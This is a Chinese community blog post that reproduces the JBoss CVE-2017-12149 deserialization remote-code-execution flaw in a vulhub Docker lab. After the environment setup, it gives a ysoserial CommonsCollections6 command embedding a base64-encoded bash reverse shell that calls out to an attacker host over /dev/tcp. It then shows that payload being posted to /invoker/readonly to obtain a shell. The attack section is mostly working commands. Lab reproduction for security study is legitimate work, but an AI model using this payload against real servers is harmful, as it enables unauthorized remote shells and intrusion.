AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

复现jboss CVE-2017-12149

2018-10-22 2297
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 参考文献:https://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhub/tree/e9509e2893909c3147fc33e804c34fabdffbdf3b/jboss/CVE-2017-12149下载地址:vulhub安装vulhub环境:ubuntu16.

参考文献:https://github.com/vulhub/vulhub
https://github.com/vulhub/vulhub/tree/e9509e2893909c3147fc33e804c34fabdffbdf3b/jboss/CVE-2017-12149
下载地址:vulhub

安装vulhub

环境:

ubuntu16.04

curl -s https://bootstrap.pypa.io/get-pip.py | python3   #安装pip
curl -s https://get.docker.com/ | sh或
sudo apt install docker.io    # 安装最新版docker
service docker start   #启动docker服务
pip install docker-compose   #安装compose
docker version  #出现server和client的版本号则安装成功

安装vulhub
vulhub/activemq/cve-2016-3088/  #进入一个目录
docker-compose up -d #运行
docker-compose down #关闭

运行jboss测试环境

/vulhub/jboss/CVE-2017-12149# docker-compose up -d

初始化完成后访问http://xxx.xxx.xxx.xxx:8080/即可看到JBoss默认页面
通过ngrok来访问内网上的内容'/home/cws6/Desktop/ngrok' http 8080

漏洞复现

  • 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:
img_857e10315dab8fbd7086fbd0c2f5cf25.png

编写反弹shell的命令

  • 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。

工具:http://jackson.thuraisamy.me/runtime-exec-payloads.html

img_964696b002da382dc99a00f8a22c6a4b.png

序列化数据生成

  • 使用ysoserial生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadgetCommonsCollections6
 java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAxxxxxxxxxxxxxxxxxxxxxD4mMQ==}|{base64,-d}|{bash,-i}" > 3.ser

发送POC

  • 将生成好的3.ser文件作为POST Body发送至/invoker/readonly即可:
    img_7c15a6ca8568f201cead35a6241b80ce.png

    img_9e0a834dbe2bcb584c9d54f7fc6fc98f.png
    2.png

成功反弹shell:

img_2447b4df4b993b31379b8bb07ab71c68.png
文章标签:
Shell
Java
应用服务中间件
容器
Docker
Python
测试技术
消息中间件
安全
spleated
目录
相关文章
Jay17
|
1月前
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
Jay17
35 5
Jay17
|
1月前
|
安全 网络安全 Apache
CVE-2021-41773 复现
CVE-2021-41773 复现
Jay17
44 1
老板这功能得加钱
|
4月前
|
安全 Oracle 关系型数据库
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
老板这功能得加钱
95 3
李火火
|
12月前
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
李火火
322 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
随风kali
|
安全 Java 应用服务中间件
干货 | Tomcat漏洞复现总结
干货 | Tomcat漏洞复现总结
随风kali
920 0
panda墨森
|
安全 NoSQL Shell
Weblogic ssrf漏洞复现---从0到1
利用Ubuntu16.04,安装docker,要以root身份执行
panda墨森
265 0
Weblogic ssrf漏洞复现---从0到1
Vista_AX
|
XML 安全 Oracle
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Vista_AX
144 0
Vista_AX
|
XML 安全 Oracle
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
Weblogic IIOP协议反序列化(CVE-2020-2551)漏洞复现
Vista_AX
1093 0
panda墨森
|
安全 jenkins Java
CVE-2017-1000353 Jenkins漏洞复现系列(一)
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行
panda墨森
742 0
panda墨森
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
panda墨森
326 0